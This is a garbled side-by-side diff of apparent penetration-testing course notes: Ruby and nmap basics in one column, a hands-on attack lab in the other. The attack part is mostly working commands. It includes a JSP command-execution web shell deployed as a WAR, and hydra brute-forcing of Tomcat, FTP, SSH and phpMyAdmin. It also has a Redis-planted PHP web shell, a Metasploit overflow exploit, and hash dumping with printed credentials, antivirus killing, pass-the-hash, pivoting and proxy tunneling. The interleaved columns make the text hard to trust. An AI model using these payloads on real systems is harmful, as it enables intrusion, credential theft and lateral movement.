539 | ||
540 | ||
541 | ------ hit enter a few times ------ | |
542 | ||
543 | ------ then type 'out' ----- this closes the file handle... | |
544 | ||
545 | ||
546 | gcc -o boom exploit.c | |
547 | ||
548 | ./boom | |
549 | ||
550 | id | |
551 | ||
552 | ||
553 | ------------------------------- | |
554 | ||
555 | ||
556 | hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 10.0.0.140 http-get /manager/html | |
557 | ||
558 | - | --------------------------Type This----------------------------------- |
558 | + | |
559 | - | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
559 | + | |
560 | - | ----------------------------------------------------------------------- |
560 | + | |
561 | - | - or if you are on a newer version of nmap - |
561 | + | |
562 | - | ---------------------------Type This----------------------------------- |
562 | + | -------------------------------------------index.jsp------------------------------------------- |
563 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
563 | + | <FORM METHOD=GET ACTION='index.jsp'> |
564 | - | ----------------------------------------------------------------------- |
564 | + | <INPUT name='cmd' type=text> |
565 | <INPUT type=submit value='Run'> | |
566 | </FORM> | |
567 | <%@ page import="java.io.*" %> | |
568 | <% | |
569 | String cmd = request.getParameter("cmd"); | |
570 | String output = ""; | |
571 | if(cmd != null) { | |
572 | String s = null; | |
573 | try { | |
574 | - | -----------------------------Type This----------------------------------- |
574 | + | Process p = Runtime.getRuntime().exec(cmd,null,null); |
575 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
575 | + | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); |
576 | - | ----------------------------------------------------------------------- |
576 | + | while((s = sI.readLine()) != null) { output += s+"</br>"; } |
577 | - | - or if you are on a newer version of nmap - |
577 | + | } catch(IOException e) { e.printStackTrace(); } |
578 | - | ---------------------------Type This----------------------------------- |
578 | + | } |
579 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
579 | + | %> |
580 | - | ---------------------Paste this into the file-------------------------- |
580 | + | <pre><%=output %></pre> |
581 | -------------------------------------------index.jsp------------------------------------------- | |
582 | ||
583 | ***** now pack the webshell ***** | |
584 | ||
585 | ||
586 | ||
587 | mkdir webshell | |
588 | cp index.jsp webshell | |
589 | ||
590 | cd webshell | |
591 | jar -cvf ../webshell.war * | |
592 | ||
593 | ||
594 | Deploy the WAR file using the built-in deploy option on the manager web-page. | |
595 | Once the WAR file is deployed I simply browse to the URL I deployed the WAR file | |
596 | now upload the webshell.war. After uploading, visit page: http://10.0.0.120:8080/webshell/ | |
597 | ||
598 | ||
599 | ||
600 | ****** This section isn't finished ****** | |
601 | ||
602 | cd ~/toolz/metasploit | |
603 | ||
604 | - | --------------------------Type This----------------------------------- |
604 | + | ./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war |
605 | - | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
605 | + | |
606 | - | ----------------------------------------------------------------------- |
606 | + | jar tf ~/bind7777.war |
607 | - | - or if you are on a newer version of nmap - |
607 | + | |
608 | - | ---------------------------Type This----------------------------------- |
608 | + | ****** This section isn't finished ****** |
609 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
609 | + | |
610 | - | ----------------------------------------------------------------------- |
610 | + | Google is your friend hahahahahahahah........ |
611 | ||
612 | ||
613 | ################# | |
614 | # Attacking FTP # | |
615 | ################# | |
616 | ||
617 | sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120 | |
618 | - | ---------------------------Type This----------------------------------- |
618 | + | |
619 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
619 | + | cd ~/toolz/hydra |
620 | - | ----------------------------------------------------------------------- |
620 | + | |
621 | - | - or if you are on a newer version of nmap - |
621 | + | hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 10.0.0.120 ftp |
622 | - | ---------------------------Type This----------------------------------- |
622 | + | |
623 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
623 | + | ftp |
624 | - | ---------------------Paste this into the file-------------------------- |
624 | + | open 10.0.0.120 |
625 | admin | |
626 | admin | |
627 | pwd | |
628 | ls -lah | |
629 | ||
630 | ls ../../ | |
631 | ||
632 | ||
633 | ################# | |
634 | # Attacking SSH # | |
635 | ################# | |
636 | cd ~/toolz/hydra | |
637 | ||
638 | hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 10.0.0.120 ssh | |
639 | ||
640 | ssh -p 1322 admin@10.0.0.120 | |
641 | ||
642 | ||
643 | ||
644 | ||
645 | cd ~/toolz/metasploit | |
646 | ||
647 | ./msfconsole | |
648 | ||
649 | use auxiliary/scanner/ssh/ssh_users | |
650 | ||
651 | set USER_FILE /home/infosecaddicts/list.txt | |
652 | ||
653 | - | --------------------------Type This----------------------------------- |
653 | + | set STOP_ON_SUCCESS true |
654 | - | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
654 | + | |
655 | - | ----------------------------------------------------------------------- |
655 | + | set RHOSTS 10.0.0.120 |
656 | - | - or if you are on a newer version of nmap - |
656 | + | |
657 | - | ---------------------------Type This----------------------------------- |
657 | + | set RPORT 1322 |
658 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
658 | + | |
659 | - | ----------------------------------------------------------------------- |
659 | + | run |
660 | ||
661 | ||
662 | ||
663 | - | ################## |
663 | + | |
664 | - | # Day 2 Homework # |
664 | + | |
665 | - | ################## |
665 | + | use auxiliary/scanner/ssh/ssh_login |
666 | - | Take screenshots of you performing all of the day 2 tasks above |
666 | + | |
667 | set USER_FILE /home/infosecaddicts/list.txt | |
668 | - | Take screenshots of you performing all of the tasks above. |
668 | + | |
669 | set PASS_FILE /home/infosecaddicts/list.txt | |
670 | - | In order to receive your certificate of proficiency you must complete all of the tasks covered in the Advanced Pentester Night School pastebin (http://pastebin.com/qnmbj04m). |
670 | + | |
671 | set STOP_ON_SUCCESS true | |
672 | - | Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Pentester-Night-School-Day2-Homework.docx) |
672 | + | |
673 | set RHOSTS 10.0.0.120 | |
674 | ||
675 | set RPORT 1322 | |
676 | ||
677 | - | IMPORTANT NOTE: |
677 | + | run |
678 | - | Your homework/challenges must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST this coming Sunday. |
678 | + | |
679 | ||
680 | sessions -l | |
681 | ||
682 | - | ############################################################ |
682 | + | sessions -u 1 |
683 | - | # Section 1: Ruby Fundamentals and Metasploit Architecture # |
683 | + | |
684 | - | ############################################################ |
684 | + | |
685 | ||
686 | - | ################################ |
686 | + | id |
687 | - | # Chapter 1: Ruby Fundamentals # |
687 | + | |
688 | - | ################################ |
688 | + | |
689 | ||
690 | ######################## | |
691 | # Attacking phpMyAdmin # | |
692 | - | - Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer |
692 | + | ######################## |
693 | - | scientist and programmer from Japan. It is a cross-platform dynamic language. |
693 | + | ****** This section isn't finished ****** |
694 | ||
695 | - | - The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby |
695 | + | hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://10.0.0.120 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema" |
696 | - | on Rails is a framework that is written in Ruby. |
696 | + | |
697 | ****** This section isn't finished ****** | |
698 | - | - Ruby's file name extensions are .rb and .rbw. |
698 | + | |
699 | Google is your friend hahahahahahahah........ | |
700 | - | - official website of this |
700 | + | |
701 | ||
702 | - | - language: www.ruby-lang.org. |
702 | + | |
703 | ||
704 | wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py | |
705 | - | - interactive Shell called Ruby Shell |
705 | + | |
706 | python pmabf.py http://10.0.0.120 root list.txt (this gave me the WRONG password) | |
707 | ||
708 | - | - Installing and Running IRB |
708 | + | |
709 | ||
710 | ||
711 | - | - open up the interactive console and play around. |
711 | + | |
712 | ||
713 | #################### | |
714 | - | irb |
714 | + | # Attacking Joomla # |
715 | #################### | |
716 | cd ~/toolz/metasploit | |
717 | ||
718 | - | - Math, Variables, Classes, Creating Objects and Inheritance |
718 | + | |
719 | ||
720 | use use auxiliary/scanner/http/joomla_plugins | |
721 | - | # following arithmetic operators: |
721 | + | |
722 | - | - Addition operator (+) — 10 + 23 |
722 | + | set RHOSTS 10.0.0.120 |
723 | - | - Subtraction operator (-) — 1001 - 34 |
723 | + | |
724 | - | - Multiplication operator (*) — 5 * 5 |
724 | + | set RPORT 8080 |
725 | - | - Division operator (/) — 12 / 2 |
725 | + | |
726 | run | |
727 | ||
728 | ||
729 | - | # Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment |
729 | + | ****** This section isn't finished ****** |
730 | - | operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by |
730 | + | Google is your friend hahahahahahahah........ |
731 | - | 30. Again, 69 is assigned to y, and then y is incremented by 33. |
731 | + | |
732 | ##################### | |
733 | - | x = 25 |
733 | + | # Attacking Jenkins # |
734 | - | x + 30 |
734 | + | |
735 | - | y = 69 |
735 | + | |
736 | - | y+33 |
736 | + | |
737 | ****** This section isn't finished ****** | |
738 | Google is your friend hahahahahahahah........ | |
739 | ||
740 | ################# | |
741 | - | - Let's look at creating classes and creating objects. |
741 | + | # Attacking NFS # |
742 | ################# | |
743 | - | - Here, the name of the class is infosecaddicts. An object has its properties and methods. |
743 | + | rpcinfo -s 10.0.0.120 |
744 | ||
745 | showmount -e 10.0.0.120 | |
746 | ||
747 | - | class Attack |
747 | + | mount -t nfs 10.0.0.120:/backup /tmp/nfs -o nolock |
748 | - | attr_accessor :of, :sqli, :xss |
748 | + | |
749 | ls /tmp/nfs | |
750 | ||
751 | - | - Now that we have created the classes let's create the objects |
751 | + | cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts |
752 | umount -l /tmp/nfs | |
753 | - | first_attack = Attack.new |
753 | + | |
754 | - | first_attack.of = "stack" |
754 | + | sudo apt-cache search fcrackzip |
755 | - | first_attack.sqli = "blind" |
755 | + | |
756 | - | first_attack.xss = "dom" |
756 | + | sudo apt-get install -y fcrackzip |
757 | - | puts first_attack.of |
757 | + | |
758 | - | puts first_attack.sqli |
758 | + | fcrackzip -D -p /home/infosecaddicts/list.txt |
759 | - | puts first_attack.xss |
759 | + | |
760 | unzip -P aaaaaa backup.tar.bz2.zip | |
761 | ||
762 | tar -zxvf backup.tar.bz2 | |
763 | ||
764 | ||
765 | - | - Let's work on some inheritance that will help make your programming life easier. When we have multiple classes, |
765 | + | |
766 | - | inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which |
766 | + | # Attacking Redis # |
767 | - | one object can access the properties/attributes of another object of a different class. Inheritance makes your |
767 | + | |
768 | - | programming life easier by maximizing code reuse. |
768 | + | sudo nmap -p 6379 --script=redis-info 10.0.0.120 |
769 | infosecaddicts | |
770 | ||
771 | sudo apt-get install -y redis-tools | |
772 | - | class Exploitframeworks |
772 | + | |
773 | - | attr_accessor :scanners, :exploits, :shellcode, :postmodules |
773 | + | |
774 | redis-cli -h 10.0.0.120 | |
775 | - | class Metasploit < Exploitframeworks |
775 | + | |
776 | CONFIG SET dir /var/www/html/main | |
777 | - | class Canvas < Exploitframeworks |
777 | + | |
778 | CONFIG GET dir | |
779 | - | class Coreimpact < Exploitframeworks |
779 | + | |
780 | config set dbfilename bomba.php | |
781 | - | class Saint < Exploitframeworks |
781 | + | |
782 | CONFIG GET dbfilename | |
783 | - | class Exploitpack < Exploitframeworks |
783 | + | |
784 | SET cmd "<?php system($_GET['joe']); ?>" | |
785 | ||
786 | BGSAVE | |
787 | ||
788 | http://10.0.0.120/bomba.php | |
789 | ||
790 | - | - Methods, More Objects, Arguments, String Functions and Expression Shortcuts |
790 | + | http://10.0.0.120/bomba.php?joe=id |
791 | ||
792 | - | - Let's create a simple method. A method is used to perform an action and is generally called with an object. |
792 | + | |
793 | (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh" | |
794 | - | - Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called, |
794 | + | |
795 | - | it will print this string: "We are Learning how to PenTest" |
795 | + | |
796 | ||
797 | - | - An object named 'bo' is created, which is used to call the method. |
797 | + | ****** This section isn't finished ****** |
798 | Google is your friend hahahahahahahah........ | |
799 | ||
800 | - | |
800 | + | |
801 | - | class Msfnl |
801 | + | |
802 | - | def learning |
802 | + | |
803 | - | puts "We are Learning how to PenTest" |
803 | + | |
804 | use auxiliary/scanner/redis/file_upload | |
805 | ||
806 | set RHOSTS 10.0.0.120 | |
807 | ||
808 | set LocalFile | |
809 | - | - Now let's define an object for our Method |
809 | + | |
810 | ****** This section isn't finished ****** | |
811 | - | joe = Msfnl.new |
811 | + | |
812 | - | joe.learning |
812 | + | |
813 | ||
814 | ||
815 | ||
816 | ||
817 | - | - An argument is a value or variable that is passed to the function while calling it. In the following example, while |
817 | + | #################################### |
818 | - | calling the puts() function, we are sending a string value to the function. This string value is used by the |
818 | + | # Finally, let's exploit something # |
819 | - | function to perform some particular operations. |
819 | + | #################################### |
820 | ||
821 | - | puts ("Pentesting") |
821 | + | nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}' |
822 | ||
823 | nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15 | |
824 | ||
825 | https://www.exploit-db.com/search | |
826 | ||
827 | - | - shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated |
827 | + | Search for: |
828 | - | assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following |
828 | + | Savant httpd 3.1 |
829 | - | statements to understand the shortcuts. |
829 | + | Apache httpd 2.0.58 ((Win32)) |
830 | ||
831 | - | g = 70 |
831 | + | |
832 | - | g = g+44 |
832 | + | Found one written in Python: |
833 | - | g += 33 |
833 | + | https://www.exploit-db.com/exploits/18401/ |
834 | ||
835 | - | - In the above statement, g is incremented by 33 and then the total value is assigned to g. |
835 | + | Found one for Savant 3.1 from Metasploit: |
836 | https://www.exploit-db.com/exploits/16770/ | |
837 | - | g *= 3 |
837 | + | |
838 | ||
839 | - | - In the above statement, g is multiplied with 3 and then assigned to g. |
839 | + | |
840 | cd ~/toolz/metasploit | |
841 | - | - Example |
841 | + | |
842 | use exploit/windows/http/savant_31_overflow | |
843 | - | - Comparison Operators, Loops, Data Types, and Constants |
843 | + | set RHOST 10.0.0.15 |
844 | set PAYLOAD windows/meterpreter/bind_nonx_tcp | |
845 | - | - Comparison operators are used for comparing one variable or constant with another variable or constant. We will show |
845 | + | set RPORT 80 |
846 | - | how to use the following comparison operators. |
846 | + | |
847 | - | 'Less than' operator (<): This operator is used to check whether a variable or constant is less than another |
847 | + | |
848 | - | variable or constant. If it's less than the other, the 'less than' operator returns true. |
848 | + | |
849 | - | 'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable |
849 | + | |
850 | - | or constant. If it's equal to the other, the 'equal to' operator returns true. |
850 | + | |
851 | - | 'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another |
851 | + | |
852 | - | variable or constant. If it's not equal to the other, the 'not equal to' operator returns true. |
852 | + | |
853 | ||
854 | ********************************** Figure out who and where you are ********************************** | |
855 | - | numberofports = 55 |
855 | + | |
856 | - | puts "number of ports found during scan" if numberofports < 300 |
856 | + | |
857 | - | numberofports = 400 |
857 | + | |
858 | - | puts "number of ports found during scan" if numberofports < 300 |
858 | + | |
859 | - | puts "number of ports found during scan" if numberofports == 300 |
859 | + | |
860 | - | puts "number of ports found during scan" if numberofports != 300 |
860 | + | |
861 | - | Example |
861 | + | |
862 | meterpreter> ipconfig | |
863 | ||
864 | - | - the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator. |
864 | + | |
865 | meterpreter> run post/windows/gather/checkvm | |
866 | - | - This operator is generally used to combine multiple conditions. |
866 | + | |
867 | - | - In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the |
867 | + | |
868 | meterpreter> run get_local_subnets | |
869 | - | - following example to understand how this operator works. |
869 | + | |
870 | ||
871 | - | ports = 100 |
871 | + | |
872 | - | puts "number of ports found on the network" if ports<100 || ports>200 |
872 | + | |
873 | - | puts "number of ports found on the network" if ports<100 || ports>75 |
873 | + | |
874 | ||
875 | meterpreter> use priv | |
876 | - | # unless |
876 | + | |
877 | ||
878 | - | portsbelow1024 = 50 |
878 | + | |
879 | - | puts "If the ports are below 1024" unless portsbelow1024 < 1000 |
879 | + | |
880 | - | puts "If the ports are below 1024" unless portsbelow1024 < 1055 |
880 | + | |
881 | - | puts "If the ports are below 1024" unless portsbelow1024 < 20 |
881 | + | |
882 | meterpreter > getuid | |
883 | Server username: NT AUTHORITY\SYSTEM | |
884 | - | - The 'unless' keyword is used to do something programmatically unless a condition is true. |
884 | + | |
885 | -------------------------------------------------------- | |
886 | ||
887 | meterpreter> run killav | |
888 | - | - Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times. |
888 | + | |
889 | meterpreter> run post/windows/gather/hashdump | |
890 | - | - See the following example to understand how a string is printed 10 times on the screen using a loop. |
890 | + | |
891 | Got the following admin hash: | |
892 | - | 10.times do puts "infosecaddicts" end |
892 | + | Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363::: |
893 | ||
894 | - | # Or use the curly braces |
894 | + | |
895 | ||
896 | - | 10.times {puts "infosecaddicts"} |
896 | + | |
897 | ||
898 | meterpreter > kerberos | |
899 | ||
900 | - | - Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while |
900 | + | This should give me the administrative password: |
901 | - | working with different data types. Data type conversion is also known as type casting. |
901 | + | )K5?Jocb(Yx |
902 | ||
903 | ||
904 | ********************************** Enumerate the host you are on ********************************** | |
905 | - | - In the following example, a and b are integers. So when a is divided by b, an integer division is performed. As a |
905 | + | |
906 | - | result, 23/25 becomes 0. |
906 | + | meterpreter> run winenum |
907 | ||
908 | - | - On the other hand, the integer variables c and d are converted to float. So the division gives the result in decimal |
908 | + | |
909 | - | points. |
909 | + | |
910 | meterpreter > run post/windows/gather/enum_logged_on_users | |
911 | - | 24/4 |
911 | + | |
912 | - | 14.0/5.0 |
912 | + | |
913 | - | a = 23 |
913 | + | |
914 | - | b = 25 |
914 | + | |
915 | - | print a/b |
915 | + | |
916 | - | c = 26 |
916 | + | |
917 | - | d = 33 |
917 | + | |
918 | - | print c.to_f/d.to_f |
918 | + | |
919 | ||
920 | ||
921 | ********************************** Get out of Meterpreter ********************************** | |
922 | ||
923 | - | - Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you |
923 | + | |
924 | - | change the value of a constant, you will see a warning message. |
924 | + | |
925 | msf exploit(savant_31_overflow) > back | |
926 | ||
927 | msf> | |
928 | ||
929 | - | - Multiple Line String Variable, Interpolation, and Regular Expressions |
929 | + | |
930 | ||
931 | - | - A multiple line string variable lets you assign the value to the string variable through multiple lines. |
931 | + | |
932 | ********************************** Lateral Movement ******************************* | |
933 | - | infosecaddicts = <<mark |
933 | + | |
934 | - | welcome |
934 | + | |
935 | - | to the |
935 | + | |
936 | - | best |
936 | + | |
937 | - | metasploit |
937 | + | |
938 | - | course |
938 | + | |
939 | - | on the |
939 | + | |
940 | - | market |
940 | + | set SMBUser Administrator |
941 | - | mark |
941 | + | |
942 | - | puts infosecaddicts |
942 | + | set SMBPass )K5?Jocb(Yx |
943 | ||
944 | set RHOST 10.0.0.15 | |
945 | ||
946 | - | - Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that |
946 | + | set payload windows/meterpreter/bind_tcp |
947 | - | it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position. |
947 | + | |
948 | - | Examine the following example to understand how interpolation works in Ruby. |
948 | + | |
949 | ||
950 | exploit | |
951 | ||
952 | - | a = 4 |
952 | + | ********************************** Get out of Meterpreter ********************************** |
953 | - | b = 6 |
953 | + | |
954 | - | puts "a * b = a*b" |
954 | + | |
955 | - | puts " #{a} * #{b} = #{a*b} " |
955 | + | |
956 | - | person = "Joe McCray" |
956 | + | msf exploit(psexec) >back |
957 | - | puts "IT Security consultant person" |
957 | + | |
958 | - | puts "IT Security consultant #{person}" |
958 | + | msf> |
959 | ||
960 | - | - Notice that the placeholders inside #{ } are evaluated and they are replaced with their values. |
960 | + | ********************************** |
961 | ||
962 | -- Option 2: | |
963 | - | - Regular expression is a powerful technique for text searching and text manipulation. Ruby provides built-in support |
963 | + | |
964 | - | for regular expressions through the Regexp class. So the regular expressions in Ruby are the objects of Regexp type. |
964 | + | |
965 | set SMBUser Administrator | |
966 | ||
967 | set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363 | |
968 | - | - In regular expressions, we define patterns to perform text search and advanced text manipulations. String literals |
968 | + | |
969 | - | and metacharacters constitute a pattern. // characters mark the beginning and end of a pattern in Ruby. |
969 | + | set payload windows/meterpreter/bind_tcp |
970 | - | The following example shows how the substring "today" |
970 | + | |
971 | - | is placed in the main string. |
971 | + | set RHOST 10.0.0.15 |
972 | ||
973 | - | a = "Woot Woot, we are learning regular expressions!!" |
973 | + | |
974 | - | puts a.sub(/^..../, 'Today') |
974 | + | |
975 | - | puts a.sub(/^..../, 'Today') |
975 | + | |
976 | ||
977 | ||
978 | ||
979 | - | - Let's Loop the expressions. This example shows how to loop the expressions. |
979 | + | ********************************** Set up your Pivot ********************************** |
980 | ||
981 | - | a.scan(/...../) {|w| puts w} |
981 | + | meterpreter > background |
982 | - | a.scan(/\S\S/) {|w| puts w} |
982 | + | <-- background the session |
983 | You want to get back to this prompt: | |
984 | msf exploit(handler) > back <--- you need to get to main msf> prompt | |
985 | ||
986 | - | - Character classes |
986 | + | |
987 | ||
988 | - | infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities" |
988 | + | sessions -l <--find a session you want to pivot through (note the IP and session number) |
989 | - | "I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y} |
989 | + | |
990 | - | "I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y} |
990 | + | Now set up Pivot with a route add |
991 | --------------------------------- | |
992 | ||
993 | route print <--- should be blank | |
994 | - | - Arrays, Push and Pop, and Hashes |
994 | + | |
995 | route add 10.0.0.15 255.255.255.0 1 <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter) | |
996 | ||
997 | - | - In the following example, numbers is an array that holds 6 integer numbers. |
997 | + | |
998 | route print <----- verify new route | |
999 | ||
1000 | ******************************Scan through your Pivot ****************************** | |
1001 | - | numbers = [2,4,6,8,10,100] |
1001 | + | |
1002 | - | puts numbers[0] |
1002 | + | use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot |
1003 | - | puts numbers[4] |
1003 | + | |
1004 | - | numbers[2] = 150 |
1004 | + | set THREADS 10 |
1005 | - | puts numbers |
1005 | + | |
1006 | set RHOSTS 10.0.0.0/24 <-- Keep changing this IP and re-running the scan until you find something you want to attack | |
1007 | ||
1008 | set PORTS 445 | |
1009 | ||
1010 | - | - Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop. |
1010 | + | run |
1011 | ||
1012 | ||
1013 | #################################### | |
1014 | - | framework = [] |
1014 | + | # Socks Tunneling with Proxychains # |
1015 | - | framework << "modules" |
1015 | + | #################################### |
1016 | - | framework << "exploits" |
1016 | + | --- Open a duplicate putty session to your Ubuntu host |
1017 | - | framework << "payloads" |
1017 | + | |
1018 | - | framework.pop |
1018 | + | sudo apt-get install -y proxychains |
1019 | infosecaddicts | |
1020 | ||
1021 | - | - Hash is a collection of elements, which is like the associative array in other languages. Each element has a key |
1021 | + | sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 1080 |
1022 | - | that is used to access the element. |
1022 | + | |
1023 | ||
1024 | Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it. | |
1025 | - | - Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes. |
1025 | + | socks4 127.0.0.1 1080 |
1026 | - | In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the |
1026 | + | |
1027 | - | respective values: 'what module should you use', 'Windows XP' and 'SSH'. |
1027 | + | ***************************Set up a Socks Proxy through your Pivot ************************* |
1028 | ||
1029 | ||
1030 | - | metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'} |
1030 | + | use auxiliary/server/socks4a |
1031 | - | print metasploit.size |
1031 | + | |
1032 | - | print metasploit["microsoft"] |
1032 | + | set SRVHOST 127.0.0.1 |
1033 | - | metasploit['microsoft'] = 'redhat' |
1033 | + | |
1034 | - | print metasploit['microsoft'] |
1034 | + | set SRVPORT 1080 |
1035 | ||
1036 | run | |
1037 | ||
1038 | - | - Writing Ruby Scripts |
1038 | + | --- Go back to your other putty session with the meterpreter shell |
1039 | cd ~ | |
1040 | ||
1041 | - | - Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what |
1041 | + | proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24 <--- This is going to be really slow |
1042 | - | this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that |
1042 | + | |
1043 | - | someone made to look for a specific port. The port that it is looking for is port 21 FTP. |
1043 | + | proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24 <--- This is going to be really slow |
1044 | ||
1045 | - | cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan |
1045 | + | |
1046 | - | ls |
1046 | + | ---close the duplicate putty session to your Ubuntu host |